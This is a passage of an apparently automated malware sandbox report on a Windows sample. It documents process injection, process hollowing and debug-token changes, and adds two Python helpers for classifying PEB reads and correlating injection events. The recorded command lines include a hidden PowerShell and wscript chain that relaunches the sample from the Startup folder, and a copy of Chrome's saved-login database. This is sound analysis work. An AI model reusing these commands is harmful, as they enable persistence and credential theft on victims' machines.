          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112EF40 mov eax, dword ptr fs:[00000030h]21_2_0112EF40
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112FF60 mov eax, dword ptr fs:[00000030h]21_2_0112FF60
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8F6A mov eax, dword ptr fs:[00000030h]21_2_011E8F6A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01128794 mov eax, dword ptr fs:[00000030h]21_2_01128794
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197794 mov eax, dword ptr fs:[00000030h]21_2_01197794
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197794 mov eax, dword ptr fs:[00000030h]21_2_01197794
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01197794 mov eax, dword ptr fs:[00000030h]21_2_01197794
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011537F5 mov eax, dword ptr fs:[00000030h]21_2_011537F5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A61C mov eax, dword ptr fs:[00000030h]21_2_0114A61C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A61C mov eax, dword ptr fs:[00000030h]21_2_0114A61C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111C600 mov eax, dword ptr fs:[00000030h]21_2_0111C600
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111C600 mov eax, dword ptr fs:[00000030h]21_2_0111C600
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111C600 mov eax, dword ptr fs:[00000030h]21_2_0111C600
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01148E00 mov eax, dword ptr fs:[00000030h]21_2_01148E00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1608 mov eax, dword ptr fs:[00000030h]21_2_011D1608
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011CFE3F mov eax, dword ptr fs:[00000030h]21_2_011CFE3F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111E620 mov eax, dword ptr fs:[00000030h]21_2_0111E620
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01127E41 mov eax, dword ptr fs:[00000030h]21_2_01127E41
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DAE44 mov eax, dword ptr fs:[00000030h]21_2_011DAE44
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DAE44 mov eax, dword ptr fs:[00000030h]21_2_011DAE44
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113AE73 mov eax, dword ptr fs:[00000030h]21_2_0113AE73
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112766D mov eax, dword ptr fs:[00000030h]21_2_0112766D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AFE87 mov eax, dword ptr fs:[00000030h]21_2_011AFE87
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E0EA5 mov eax, dword ptr fs:[00000030h]21_2_011E0EA5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E0EA5 mov eax, dword ptr fs:[00000030h]21_2_011E0EA5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E0EA5 mov eax, dword ptr fs:[00000030h]21_2_011E0EA5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011946A7 mov eax, dword ptr fs:[00000030h]21_2_011946A7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8ED6 mov eax, dword ptr fs:[00000030h]21_2_011E8ED6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01158EC7 mov eax, dword ptr fs:[00000030h]21_2_01158EC7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011436CC mov eax, dword ptr fs:[00000030h]21_2_011436CC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011CFEC0 mov eax, dword ptr fs:[00000030h]21_2_011CFEC0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011276E2 mov eax, dword ptr fs:[00000030h]21_2_011276E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011416E0 mov ecx, dword ptr fs:[00000030h]21_2_011416E0
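The rows above record every `mov reg, dword ptr fs:[00000030h]` in process 21, i.e. every load of the PEB pointer, but a PEB read on its own is not an anti-debug check: loader and runtime code reads the PEB constantly for Ldr, ProcessHeap and ProcessParameters, while BeingDebugged (+0x02) and NtGlobalFlag (+0x68) reads are the ones that matter for the "Checks if the current process is being debugged" verdict. The helper below is an added triage example written for this report, not Joe Sandbox code; it follows each PEB load through the next few instructions and names the field that is actually dereferenced. The disassembly it runs on is constructed to resemble the flagged functions and is not taken from the sample.

```python
"""Classify what each 32-bit fs:[30h] (PEB) load goes on to read.
Added example for this report, not Joe Sandbox code. SAMPLE_DISASM is
constructed, not disassembly of the sample."""
import re

# 32-bit PEB field offsets (public layout; fs:[30h] holds the PEB on x86 Windows).
PEB_FIELDS = {
    0x02: "BeingDebugged",
    0x0C: "Ldr",
    0x10: "ProcessParameters",
    0x18: "ProcessHeap",
    0x68: "NtGlobalFlag",
}
# Fields whose read is a classic debugger check rather than ordinary runtime use.
ANTI_DEBUG_FIELDS = {"BeingDebugged", "NtGlobalFlag"}

PEB_LOAD = re.compile(r"^\s*mov\s+(\w+),\s*dword ptr fs:\[(?:0x30|0*30h?)\]", re.I)
DEREF = re.compile(r"\[(\w+)(?:\+(0x[0-9a-f]+|[0-9a-f]+h|\d+))?\]", re.I)
REG_COPY = re.compile(r"^\s*mov\s+(\w+),\s*(\w+)\s*$", re.I)


def _offset(tok):
    """Parse an x86 displacement written as 0x68, 68h or decimal."""
    if tok is None:
        return 0
    tok = tok.lower()
    if tok.startswith("0x"):
        return int(tok, 16)
    if tok.endswith("h"):
        return int(tok[:-1], 16)
    return int(tok)


def classify_peb_reads(disasm, window=4):
    """Map each fs:[30h] load to the PEB field dereferenced through that
    register within `window` following instructions. Returns {field: count};
    loads never dereferenced inside the window are counted as 'unknown'."""
    hits = {}
    for i, line in enumerate(disasm):
        m = PEB_LOAD.match(line)
        if not m:
            continue
        reg = m.group(1).lower()
        field = "unknown"
        for follow in disasm[i + 1:i + 1 + window]:
            d = DEREF.search(follow)
            if d and d.group(1).lower() == reg:
                off = _offset(d.group(2))
                field = PEB_FIELDS.get(off, "PEB+0x%x" % off)
                break
            c = REG_COPY.match(follow)  # PEB pointer copied to another register
            if c and c.group(2).lower() == reg:
                reg = c.group(1).lower()
        hits[field] = hits.get(field, 0) + 1
    return hits


def is_anti_debug(hits):
    """True if any classified read targets a debugger-detection field."""
    return any(f in ANTI_DEBUG_FIELDS for f in hits)


# Constructed disassembly (not from the sample): two anti-debug reads followed
# by two benign reads of the kind any loader or CRT stub performs.
SAMPLE_DISASM = [
    "mov eax, dword ptr fs:[00000030h]",
    "movzx eax, byte ptr [eax+2]",       # PEB->BeingDebugged
    "test eax, eax",
    "jne  debugger_present",
    "mov eax, dword ptr fs:[00000030h]",
    "mov eax, dword ptr [eax+68h]",      # PEB->NtGlobalFlag
    "and eax, 70h",
    "mov ecx, dword ptr fs:[00000030h]",
    "mov eax, dword ptr [ecx+0Ch]",      # PEB->Ldr (module list walking)
    "mov eax, dword ptr fs:[00000030h]",
    "mov edx, eax",
    "push dword ptr [edx+18h]",          # PEB->ProcessHeap
]

if __name__ == "__main__":
    hits = classify_peb_reads(SAMPLE_DISASM)
    print(hits, "anti-debug" if is_anti_debug(hits) else "benign")
```

Run against a real listing, a function such as 21_2_011D1C06 with fourteen PEB loads would typically resolve to mostly Ldr and ProcessHeap reads, which is why the report files these rows under an informational signature and reserves the debugger-check verdict for the BeingDebugged and NtGlobalFlag cases.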
Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Process token adjusted: Debug (4 process instances)
Source: C:\Windows\SysWOW64\help.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe base: 400000 value starts with: 4D5A (2 occurrences)
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Thread register set: target process: 3472 (3 occurrences)
Source: C:\Windows\SysWOW64\help.exe | Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 9D0000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Section unmapped: C:\Windows\SysWOW64\help.exe base address: B20000
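The four signatures above are each built from a single primitive (a PE image written to a remote process, an RWX section mapped into it, a thread context rewritten, an APC queued, the original image unmapped). What turns them into "process hollowing" or "APC injection" is correlating those primitives per source/target pair, which is how the ipconfig.exe and help.exe unmaps line up with the RWX sections mapped into the same targets. The following is an added example of that correlation, written for this report and not Joe Sandbox code. The event schema (`src`, `target`, `op` and the op-specific fields) and the sample events are constructed to mirror the rows above; the suspended creation, the pid-3472 thread context target being help.exe, and the thread resume are assumptions made for the sample data, not facts the report states.

```python
"""Correlate injection primitives into per-(source, target) verdicts.
Added example for this report, not Joe Sandbox code. The event field names
and SAMPLE_EVENTS are constructed after the rows in this report."""
from collections import defaultdict

MZ_MAGIC = "4D5A"  # 'MZ' PE header bytes, as the report prints them


def _primitives(events):
    """Reduce raw events to a set of primitive names per (src, target)."""
    prims = defaultdict(set)
    for e in events:
        key = (e["src"], e["target"])
        op = e["op"]
        if op == "create_process" and e.get("suspended"):
            prims[key].add("created_suspended")
        elif op == "section_unmapped":
            prims[key].add("image_unmapped")
        elif op == "memory_written" and e.get("value", "").upper().startswith(MZ_MAGIC):
            prims[key].add("pe_written")
        elif op == "section_mapped" and "execute" in e.get("protection", ""):
            prims[key].add("rwx_mapped")
        elif op == "section_mapped":
            prims[key].add("rw_mapped")
        elif op == "thread_set_context":
            prims[key].add("thread_context_set")
        elif op == "apc_queued":
            prims[key].add("apc_queued")
        elif op == "thread_resume":
            prims[key].add("thread_resumed")
    return prims


def correlate_injection(events):
    """Return {(src, target): sorted technique labels}. A payload (PE written
    or RWX section mapped) is required before any technique is named; pairs
    with only isolated primitives are reported as 'primitive:<name>' so no
    observation is silently dropped."""
    verdicts = {}
    for key, p in _primitives(events).items():
        payload = {"pe_written", "rwx_mapped"} & p
        labels = set()
        if "image_unmapped" in p and payload:
            labels.add("process_hollowing")
        if "thread_context_set" in p and payload:
            labels.add("thread_context_hijack")  # also the resume step of hollowing
        if "apc_queued" in p and payload:
            labels.add("apc_injection")
        if not labels:
            labels = {"primitive:" + x for x in sorted(p)}
        verdicts[key] = sorted(labels)
    return verdicts


STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe"
HELP = r"C:\Windows\SysWOW64\help.exe"
IPCONFIG = r"C:\Windows\SysWOW64\ipconfig.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events modelled on the report rows (suspended creation, the
# thread-context target and the resume are assumptions, not report facts).
SAMPLE_EVENTS = [
    {"src": STARTUP, "target": STARTUP, "op": "memory_written", "base": 0x400000, "value": "4D5A9000"},
    {"src": STARTUP, "target": IPCONFIG, "op": "create_process", "suspended": True},
    {"src": STARTUP, "target": IPCONFIG, "op": "section_unmapped", "base": 0x9D0000},
    {"src": STARTUP, "target": IPCONFIG, "op": "section_mapped", "protection": "execute and read and write"},
    {"src": STARTUP, "target": HELP, "op": "create_process", "suspended": True},
    {"src": STARTUP, "target": HELP, "op": "section_unmapped", "base": 0xB20000},
    {"src": STARTUP, "target": HELP, "op": "section_mapped", "protection": "execute and read and write"},
    {"src": STARTUP, "target": HELP, "op": "thread_set_context"},
    {"src": STARTUP, "target": HELP, "op": "thread_resume"},
    {"src": STARTUP, "target": EXPLORER, "op": "section_mapped", "protection": "execute and read and write"},
    {"src": STARTUP, "target": EXPLORER, "op": "apc_queued"},
    {"src": HELP, "target": EXPLORER, "op": "section_mapped", "protection": "read write"},
]

if __name__ == "__main__":
    for (src, dst), labels in correlate_injection(SAMPLE_EVENTS).items():
        print(f"{src} -> {dst}: {', '.join(labels)}")
```

Real telemetry keys thread-context and APC events by pid (the report itself shows "target process: 3472" rather than an image path), so in practice the first step is to resolve pids to image paths from the process-creation events before running the correlation.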
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe (2 occurrences)
Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
Source: C:\Users\user\Desktop\f5cZJ0WC0H.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000016.00000000.365675313.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000016.00000002.503766410.0000000001640000.00000002.00000001.sdmp, help.exe, 00000018.00000002.509932317.0000000004170000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Users\user\Desktop\f5cZJ0WC0H.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
